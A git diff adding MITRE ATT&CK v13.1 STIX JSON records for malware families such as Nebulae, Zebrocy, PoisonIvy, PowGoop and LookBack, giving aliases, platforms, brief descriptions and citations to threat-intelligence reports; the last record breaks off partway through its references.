diff --git a/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--22b17791-45bf-45c0-9322-ff1a0af5cf2b.json b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--22b17791-45bf-45c0-9322-ff1a0af5cf2b.json new file mode 100644 index 0000000000000000000000000000000000000000..d5f99d8c45f6334c6117e6dfeb6ab9bd2a50fdc3 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--22b17791-45bf-45c0-9322-ff1a0af5cf2b.json @@ -0,0 +1,46 @@ +{ + "type": "bundle", + "id": "bundle--2774b2b7-7e95-4249-add2-04c6094d7c49", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_aliases": [ + "Nebulae" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--22b17791-45bf-45c0-9322-ff1a0af5cf2b", + "type": "malware", + "created": "2021-06-30T14:44:35.055Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "S0630", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0630" + }, + { + "source_name": "Bitdefender Naikon April 2021", + "url": "https://www.bitdefender.com/files/News/CaseStudies/study/396/Bitdefender-PR-Whitepaper-NAIKON-creat5397-en-EN.pdf", + "description": "Vrabie, V. (2021, April 23). NAIKON \u2013 Traces from a Military Cyber-Espionage Operation. Retrieved June 29, 2021." + } + ], + "modified": "2021-10-15T22:57:32.775Z", + "name": "Nebulae", + "description": "[Nebulae](https://attack.mitre.org/software/S0630) Is a backdoor that has been used by [Naikon](https://attack.mitre.org/groups/G0019) since at least 2020.(Citation: Bitdefender Naikon April 2021)", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--234e7770-99b0-4f65-b983-d3230f76a60b.json b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--234e7770-99b0-4f65-b983-d3230f76a60b.json new file mode 100644 index 0000000000000000000000000000000000000000..c52944f68836df3911f67705eeb5d7dd543e5a2a --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--234e7770-99b0-4f65-b983-d3230f76a60b.json @@ -0,0 +1,46 @@ +{ + "type": "bundle", + "id": "bundle--53dda798-eeea-43c0-a040-3ffdb08f959d", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "macOS" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_aliases": [ + "Janicab" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--234e7770-99b0-4f65-b983-d3230f76a60b", + "type": "malware", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0163", + "external_id": "S0163" + }, + { + "source_name": "Janicab", + "description": "Thomas. (2013, July 15). New signed malware called Janicab. Retrieved July 17, 2017.", + "url": "http://www.thesafemac.com/new-signed-malware-called-janicab/" + } + ], + "modified": "2020-03-19T18:00:00.645Z", + "name": "Janicab", + "description": "[Janicab](https://attack.mitre.org/software/S0163) is an OS X trojan that relied on a valid developer ID and oblivious users to install it. (Citation: Janicab)", + "x_mitre_version": "1.1", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--98e8a977-3416-43aa-87fa-33e287e9c14c.json b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--98e8a977-3416-43aa-87fa-33e287e9c14c.json new file mode 100644 index 0000000000000000000000000000000000000000..6236b2a824c57251f89f953d376e87f54e05b2b9 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--98e8a977-3416-43aa-87fa-33e287e9c14c.json @@ -0,0 +1,40 @@ +{ + "type": "bundle", + "id": "bundle--5c34583c-76ce-4ff2-af84-0b2fd9dd6872", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "malware" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--98e8a977-3416-43aa-87fa-33e287e9c14c", + "type": "malware", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0155", + "external_id": "S0155" + }, + { + "source_name": "FireEye APT32 May 2017", + "description": "Carr, N.. (2017, May 14). Cyber Espionage is Alive and Well: APT32 and the Threat to Global Corporations. Retrieved June 18, 2017.", + "url": "https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html" + } + ], + "modified": "2018-10-17T00:14:20.652Z", + "name": "WINDSHIELD", + "description": "[WINDSHIELD](https://attack.mitre.org/software/S0155) is a signature backdoor used by [APT32](https://attack.mitre.org/groups/G0050). (Citation: FireEye APT32 May 2017)", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--9e2bba94-950b-4fcf-8070-cb3f816c5f4e.json b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--9e2bba94-950b-4fcf-8070-cb3f816c5f4e.json new file mode 100644 index 0000000000000000000000000000000000000000..7d3b3e4a70622041f7df153a491e2fe5a6dc8cf3 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--9e2bba94-950b-4fcf-8070-cb3f816c5f4e.json @@ -0,0 +1,46 @@ +{ + "type": "bundle", + "id": "bundle--82cd1614-a1df-459f-8d1a-1648ad324072", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_aliases": [ + "hcdLoader" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--9e2bba94-950b-4fcf-8070-cb3f816c5f4e", + "type": "malware", + "created": "2017-05-31T21:32:46.890Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0071", + "external_id": "S0071" + }, + { + "url": "http://www.secureworks.com/resources/blog/where-you-at-indicators-of-lateral-movement-using-at-exe-on-windows-7-systems/", + "description": "Carvey, H.. (2014, September 2). Where you AT?: Indicators of lateral movement using at.exe on Windows 7 systems. Retrieved January 25, 2016.", + "source_name": "Dell Lateral Movement" + } + ], + "modified": "2020-03-30T18:36:37.734Z", + "name": "hcdLoader", + "description": "[hcdLoader](https://attack.mitre.org/software/S0071) is a remote access tool (RAT) that has been used by [APT18](https://attack.mitre.org/groups/G0026). (Citation: Dell Lateral Movement)", + "x_mitre_version": "1.1", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--a4f57468-fbd5-49e4-8476-52088220b92d.json b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--a4f57468-fbd5-49e4-8476-52088220b92d.json new file mode 100644 index 0000000000000000000000000000000000000000..d2796d0f3f8e69d5dcff5ae89fdf36070a62faf1 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--a4f57468-fbd5-49e4-8476-52088220b92d.json 
@@ -0,0 +1,83 @@ +{ + "type": "bundle", + "id": "bundle--7456d3b8-7c52-41fc-9829-f2952a546e14", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_contributors": [ + "Emily Ratliff, IBM" + ], + "x_mitre_aliases": [ + "Zebrocy", + "Zekapab" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--a4f57468-fbd5-49e4-8476-52088220b92d", + "type": "malware", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "S0251", + "url": "https://attack.mitre.org/software/S0251", + "source_name": "mitre-attack" + }, + { + "source_name": "Zebrocy", + "description": "(Citation: Palo Alto Sofacy 06-2018)(Citation: Unit42 Cannon Nov 2018)" + }, + { + "source_name": "Zekapab", + "description": "(Citation: CyberScoop APT28 Nov 2018)(Citation: Accenture SNAKEMACKEREL Nov 2018)" + }, + { + "source_name": "Palo Alto Sofacy 06-2018", + "description": "Lee, B., Falcone, R. (2018, June 06). Sofacy Group\u2019s Parallel Attacks. Retrieved June 18, 2018.", + "url": "https://researchcenter.paloaltonetworks.com/2018/06/unit42-sofacy-groups-parallel-attacks/" + }, + { + "description": "Falcone, R., Lee, B. (2018, November 20). Sofacy Continues Global Attacks and Wheels Out New \u2018Cannon\u2019 Trojan. Retrieved November 26, 2018.", + "url": "https://researchcenter.paloaltonetworks.com/2018/11/unit42-sofacy-continues-global-attacks-wheels-new-cannon-trojan/", + "source_name": "Unit42 Cannon Nov 2018" + }, + { + "source_name": "Unit42 Sofacy Dec 2018", + "url": "https://unit42.paloaltonetworks.com/dear-joohn-sofacy-groups-global-campaign/", + "description": "Lee, B., Falcone, R. (2018, December 12). Dear Joohn: The Sofacy Group\u2019s Global Campaign. Retrieved April 19, 2019." 
+ }, + { + "source_name": "CISA Zebrocy Oct 2020", + "url": "https://us-cert.cisa.gov/ncas/analysis-reports/ar20-303b", + "description": "CISA. (2020, October 29). Malware Analysis Report (AR20-303B). Retrieved December 9, 2020." + }, + { + "description": "Shoorbajee, Z. (2018, November 29). Accenture: Russian hackers using Brexit talks to disguise phishing lures. Retrieved July 16, 2019.", + "url": "https://www.cyberscoop.com/apt28-brexit-phishing-accenture/", + "source_name": "CyberScoop APT28 Nov 2018" + }, + { + "source_name": "Accenture SNAKEMACKEREL Nov 2018", + "url": "https://www.accenture.com/t20181129T203820Z__w__/us-en/_acnmedia/PDF-90/Accenture-snakemackerel-delivers-zekapab-malware.pdf#zoom=50", + "description": "Accenture Security. (2018, November 29). SNAKEMACKEREL. Retrieved April 15, 2019." + } + ], + "modified": "2021-04-23T19:45:36.003Z", + "name": "Zebrocy", + "description": "[Zebrocy](https://attack.mitre.org/software/S0251) is a Trojan that has been used by [APT28](https://attack.mitre.org/groups/G0007) since at least November 2015. The malware comes in several programming language variants, including C++, Delphi, AutoIt, C#, VB.NET, and Golang. (Citation: Palo Alto Sofacy 06-2018)(Citation: Unit42 Cannon Nov 2018)(Citation: Unit42 Sofacy Dec 2018)(Citation: CISA Zebrocy Oct 2020) ", + "x_mitre_version": "3.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--aa1462a1-d065-416c-b354-bedd04998c7f.json b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--aa1462a1-d065-416c-b354-bedd04998c7f.json new file mode 100644 index 0000000000000000000000000000000000000000..bc97c9c2820ede502ce45acf07c483ca23e02741 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--aa1462a1-d065-416c-b354-bedd04998c7f.json 
@@ -0,0 +1,50 @@ +{ + "type": "bundle", + "id": "bundle--1a1482d8-acf9-423c-bc42-d45dae2a20d7", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_aliases": [ + "Cobian RAT" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--aa1462a1-d065-416c-b354-bedd04998c7f", + "type": "malware", + "created": "2019-01-29T21:40:37.350Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "url": "https://attack.mitre.org/software/S0338", + "source_name": "mitre-attack", + "external_id": "S0338" + }, + { + "source_name": "Cobian RAT", + "description": "(Citation: Zscaler Cobain Aug 2017)" + }, + { + "source_name": "Zscaler Cobian Aug 2017", + "url": "https://www.zscaler.com/blogs/research/cobian-rat-backdoored-rat", + "description": "Yadav, A., et al. (2017, August 31). Cobian RAT \u2013 A backdoored RAT. Retrieved November 13, 2018." + } + ], + "modified": "2020-03-30T15:22:42.218Z", + "name": "Cobian RAT", + "description": "[Cobian RAT](https://attack.mitre.org/software/S0338) is a backdoor, remote access tool that has been observed since 2016.(Citation: Zscaler Cobian Aug 2017)", + "x_mitre_version": "1.1", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--b00f90b6-c75c-4bfd-b813-ca9e6c9ebf29.json b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--b00f90b6-c75c-4bfd-b813-ca9e6c9ebf29.json new file mode 100644 index 0000000000000000000000000000000000000000..6190b3c61d61734121deb9f2166658ec75fa9e67 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--b00f90b6-c75c-4bfd-b813-ca9e6c9ebf29.json 
@@ -0,0 +1,60 @@ +{ + "type": "bundle", + "id": "bundle--eb708c18-e424-4148-87c4-9793e735c1e7", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "macOS" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_aliases": [ + "OSX_OCEANLOTUS.D", + "Backdoor.MacOS.OCEANLOTUS.F" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--b00f90b6-c75c-4bfd-b813-ca9e6c9ebf29", + "type": "malware", + "created": "2019-01-30T19:18:19.667Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "S0352", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0352" + }, + { + "source_name": "OSX_OCEANLOTUS.D", + "description": "(Citation: TrendMicro MacOS April 2018)" + }, + { + "source_name": "Backdoor.MacOS.OCEANLOTUS.F", + "description": "(Citation: Trend Micro MacOS Backdoor November 2020)" + }, + { + "description": "Horejsi, J. (2018, April 04). New MacOS Backdoor Linked to OceanLotus Found. Retrieved November 13, 2018.", + "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/new-macos-backdoor-linked-to-oceanlotus-found/", + "source_name": "TrendMicro MacOS April 2018" + }, + { + "source_name": "Trend Micro MacOS Backdoor November 2020", + "url": "https://www.trendmicro.com/en_us/research/20/k/new-macos-backdoor-connected-to-oceanlotus-surfaces.html", + "description": "Magisa, L. (2020, November 27). New MacOS Backdoor Connected to OceanLotus Surfaces. Retrieved December 2, 2020." 
+ } + ], + "modified": "2022-01-14T21:53:00.543Z", + "name": "OSX_OCEANLOTUS.D", + "description": "[OSX_OCEANLOTUS.D](https://attack.mitre.org/software/S0352) is a MacOS backdoor with several variants that has been used by [APT32](https://attack.mitre.org/groups/G0050).(Citation: TrendMicro MacOS April 2018)(Citation: Trend Micro MacOS Backdoor November 2020)", + "x_mitre_version": "2.2", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--b42378e0-f147-496f-992a-26a49705395b.json b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--b42378e0-f147-496f-992a-26a49705395b.json new file mode 100644 index 0000000000000000000000000000000000000000..fe489ec1044cca53d11954515ee3d53947d9ebba --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--b42378e0-f147-496f-992a-26a49705395b.json 
@@ -0,0 +1,90 @@ +{ + "type": "bundle", + "id": "bundle--43246a01-6f7c-4c5d-98ca-34b0c376a70a", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-20T22:03:44.669Z", + "name": "PoisonIvy", + "description": "[PoisonIvy](https://attack.mitre.org/software/S0012) is a popular remote access tool (RAT) that has been used by many groups.(Citation: FireEye Poison Ivy)(Citation: Symantec Elderwood Sept 2012)(Citation: Symantec Darkmoon Aug 2005)", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_version": "2.1", + "x_mitre_contributors": [ + "Darren Spruell" + ], + "x_mitre_aliases": [ + "PoisonIvy", + "Breut", + "Poison Ivy", + "Darkmoon" + ], + "type": "malware", + "id": "malware--b42378e0-f147-496f-992a-26a49705395b", + "created": "2017-05-31T21:32:15.263Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0012", + "external_id": "S0012" + }, + { + "source_name": "Poison Ivy", + "description": "(Citation: FireEye Poison Ivy) (Citation: Symantec Darkmoon Sept 2014)" + }, + { + "source_name": "PoisonIvy", + "description": "(Citation: FireEye Poison Ivy)(Citation: Symantec Darkmoon Sept 2014)" + }, + { + "source_name": "Breut", + "description": "(Citation: Novetta-Axiom)" + }, + { + "source_name": "Darkmoon", + "description": "(Citation: Symantec Darkmoon Sept 2014)" + }, + { + "source_name": "FireEye Poison Ivy", + "description": "FireEye. (2014). POISON IVY: Assessing Damage and Extracting Intelligence. Retrieved November 12, 2014.", + "url": "https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-poison-ivy.pdf" + }, + { + "source_name": "Symantec Darkmoon Aug 2005", + "description": "Hayashi, K. (2005, August 18). Backdoor.Darkmoon. 
Retrieved February 23, 2018.", + "url": "https://www.symantec.com/security_response/writeup.jsp?docid=2005-081910-3934-99" + }, + { + "source_name": "Novetta-Axiom", + "description": "Novetta. (n.d.). Operation SMN: Axiom Threat Actor Group Report. Retrieved November 12, 2014.", + "url": "https://web.archive.org/web/20230115144216/http://www.novetta.com/wp-content/uploads/2014/11/Executive_Summary-Final_1.pdf" + }, + { + "source_name": "Symantec Elderwood Sept 2012", + "description": "O'Gorman, G., and McDonald, G.. (2012, September 6). The Elderwood Project. Retrieved February 15, 2018.", + "url": "https://web.archive.org/web/20190717233006/http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-elderwood-project.pdf" + }, + { + "source_name": "Symantec Darkmoon Sept 2014", + "description": "Payet, L. (2014, September 19). Life on Mars: How attackers took advantage of hope for alien existance in new Darkmoon campaign. Retrieved September 13, 2018.", + "url": "https://www.symantec.com/connect/blogs/life-mars-how-attackers-took-advantage-hope-alien-existance-new-darkmoon-campaign" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "labels": [ + "malware" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--b8d48deb-450c-44f6-a934-ac8765aa89cb.json b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--b8d48deb-450c-44f6-a934-ac8765aa89cb.json new file mode 100644 index 0000000000000000000000000000000000000000..de861690820e206636b08e393587ac51588fd7db --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--b8d48deb-450c-44f6-a934-ac8765aa89cb.json 
@@ -0,0 +1,48 @@ +{ + "type": "bundle", + "id": "bundle--ff939eb3-a942-4a5c-9272-edad951a017f", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_aliases": [ + "DanBot" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "malware", + "id": "malware--b8d48deb-450c-44f6-a934-ac8765aa89cb", + "created": "2022-06-03T14:35:23.246Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "S1014", + "url": "https://attack.mitre.org/software/S1014" + }, + { + "source_name": "SecureWorks August 2019", + "url": "https://www.secureworks.com/blog/lyceum-takes-center-stage-in-middle-east-campaign", + "description": "SecureWorks 2019, August 27 LYCEUM Takes Center Stage in Middle East Campaign Retrieved. 2019/11/19 " + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "[DanBot](https://attack.mitre.org/software/S1014) is a first-stage remote access Trojan written in C# that has been used by [HEXANE](https://attack.mitre.org/groups/G1001) since at least 2018.(Citation: SecureWorks August 2019)", + "modified": "2022-09-01T14:11:46.207Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "DanBot", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--bd7a9e13-69fa-4243-a5e5-04326a63f9f2.json b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--bd7a9e13-69fa-4243-a5e5-04326a63f9f2.json new file mode 100644 index 0000000000000000000000000000000000000000..78175e72bb40df32e838b301cef5600b15536643 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--bd7a9e13-69fa-4243-a5e5-04326a63f9f2.json 
@@ -0,0 +1,48 @@ +{ + "type": "bundle", + "id": "bundle--f046f843-25aa-46b0-b270-eac93b1ca462", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-26T19:34:38.763Z", + "name": "Pillowmint", + "description": "[Pillowmint](https://attack.mitre.org/software/S0517) is a point-of-sale malware used by [FIN7](https://attack.mitre.org/groups/G0046) designed to capture credit card information.(Citation: Trustwave Pillowmint June 2020)", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_version": "1.2", + "x_mitre_aliases": [ + "Pillowmint" + ], + "type": "malware", + "id": "malware--bd7a9e13-69fa-4243-a5e5-04326a63f9f2", + "created": "2020-07-27T14:06:29.560Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0517", + "external_id": "S0517" + }, + { + "source_name": "Trustwave Pillowmint June 2020", + "description": "Trustwave SpiderLabs. (2020, June 22). Pillowmint: FIN7\u2019s Monkey Thief . Retrieved July 27, 2020.", + "url": "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/pillowmint-fin7s-monkey-thief/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "labels": [ + "malware" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--c19d19ae-dd58-4584-8469-966bbeaa80e3.json b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--c19d19ae-dd58-4584-8469-966bbeaa80e3.json new file mode 100644 index 0000000000000000000000000000000000000000..6b0c0bb674abb9da0a611ce97b0049a05d35e7e8 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--c19d19ae-dd58-4584-8469-966bbeaa80e3.json 
@@ -0,0 +1,56 @@ +{ + "type": "bundle", + "id": "bundle--b5dc7694-471e-447f-82ff-a56de351befd", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-10-17T14:40:59.636Z", + "name": "PowGoop", + "description": "[PowGoop](https://attack.mitre.org/software/S1046) is a loader that consists of a DLL loader and a PowerShell-based downloader; it has been used by [MuddyWater](https://attack.mitre.org/groups/G0069) as their main loader.(Citation: DHS CISA AA22-055A MuddyWater February 2022)(Citation: CYBERCOM Iranian Intel Cyber January 2022)", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_contributors": [ + "Ozer Sarilar, @ozersarilar, STM" + ], + "x_mitre_aliases": [ + "PowGoop" + ], + "type": "malware", + "id": "malware--c19d19ae-dd58-4584-8469-966bbeaa80e3", + "created": "2022-09-29T15:44:58.517Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S1046", + "external_id": "S1046" + }, + { + "source_name": "CYBERCOM Iranian Intel Cyber January 2022", + "description": "Cyber National Mission Force. (2022, January 12). Iranian intel cyber suite of malware uses open source tools. Retrieved September 30, 2022.", + "url": "https://www.cybercom.mil/Media/News/Article/2897570/iranian-intel-cyber-suite-of-malware-uses-open-source-tools/" + }, + { + "source_name": "DHS CISA AA22-055A MuddyWater February 2022", + "description": "FBI, CISA, CNMF, NCSC-UK. (2022, February 24). Iranian Government-Sponsored Actors Conduct Cyber Operations Against Global Government and Commercial Networks. 
Retrieved September 27, 2022.", + "url": "https://www.cisa.gov/uscert/ncas/alerts/aa22-055a" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "labels": [ + "malware" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--c9ccc4df-1f56-49e7-ad57-b383e1451688.json b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--c9ccc4df-1f56-49e7-ad57-b383e1451688.json new file mode 100644 index 0000000000000000000000000000000000000000..924f8d166a6a957908e994c64dc67e25d37d6b70 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--c9ccc4df-1f56-49e7-ad57-b383e1451688.json 
@@ -0,0 +1,60 @@ +{ + "type": "bundle", + "id": "bundle--ffbf2dcf-0910-4e75-a662-97b1d0adb4b7", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_aliases": [ + "LookBack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--c9ccc4df-1f56-49e7-ad57-b383e1451688", + "type": "malware", + "created": "2021-03-01T14:07:36.692Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "S0582", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0582" + }, + { + "source_name": "LookBack", + "description": "(Citation: Proofpoint LookBack Malware Aug 2019)" + }, + { + "source_name": "Proofpoint LookBack Malware Aug 2019", + "url": "https://www.proofpoint.com/us/threat-insight/post/lookback-malware-targets-united-states-utilities-sector-phishing-attacks", + "description": "Raggi, M. Schwarz, D.. (2019, August 1). LookBack Malware Targets the United States Utilities Sector with Phishing Attacks Impersonating Engineering Licensing Boards. Retrieved February 25, 2021." + }, + { + "source_name": "Dragos TALONITE", + "url": "https://www.dragos.com/threat/talonite/", + "description": "Dragos. (null). TALONITE. Retrieved February 25, 2021." + }, + { + "source_name": "Dragos Threat Report 2020", + "url": "https://hub.dragos.com/hubfs/Year-in-Review/Dragos_2020_ICS_Cybersecurity_Year_In_Review.pdf?hsCtaTracking=159c0fc3-92d8-425d-aeb8-12824f2297e8%7Cf163726d-579b-4996-9a04-44e5a124d770", + "description": "Dragos. (n.d.). ICS Cybersecurity Year in Review 2020. Retrieved February 25, 2021." 
